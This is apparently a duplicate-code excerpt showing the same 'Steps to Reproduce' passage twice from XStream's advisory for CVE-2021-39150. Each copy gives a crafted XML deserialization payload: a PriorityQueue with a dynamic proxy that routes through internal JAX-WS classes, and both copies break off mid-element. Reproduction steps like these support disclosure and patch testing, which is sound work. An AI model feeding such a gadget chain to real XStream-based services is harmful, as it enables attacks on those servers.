Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream:
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
<owner/>
<managedObjectManagerClosed>false</managedObjectManagerClosed>
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
<stubHandlers>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<com.sun.xml.internal.ws.client.sei.StubHandler>
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
<indices>
<int>0</int>
</indices>
<getters>
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
</getters>
<accessors>
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
<val_-isJAXBElement>false</val_-isJAXBElement>
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
<type>int</type>
<field>
<name>hash</name>
<clazz>java.lang.String</clazz>
</field>
</val_-getter>
<val_-isListType>false</val_-isListType>
<val_-n>
<namespaceURI/>
<localPart>hash</localPart>
<prefix/>
</val_-n>
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
<type>java.lang.String</type>
<method>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
xstream-distribution/src/content/CVE-2021-39150.html [35:87]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Steps to Reproduce
Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
unmarshal it again with XStream:
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
<owner/>
<managedObjectManagerClosed>false</managedObjectManagerClosed>
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
<stubHandlers>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<com.sun.xml.internal.ws.client.sei.StubHandler>
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
<indices>
<int>0</int>
</indices>
<getters>
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
</getters>
<accessors>
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
<val_-isJAXBElement>false</val_-isJAXBElement>
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
<type>int</type>
<field>
<name>hash</name>
<clazz>java.lang.String</clazz>
</field>
</val_-getter>
<val_-isListType>false</val_-isListType>
<val_-n>
<namespaceURI/>
<localPart>hash</localPart>
<prefix/>
</val_-n>
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
<type>java.lang.String</type>
<method>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -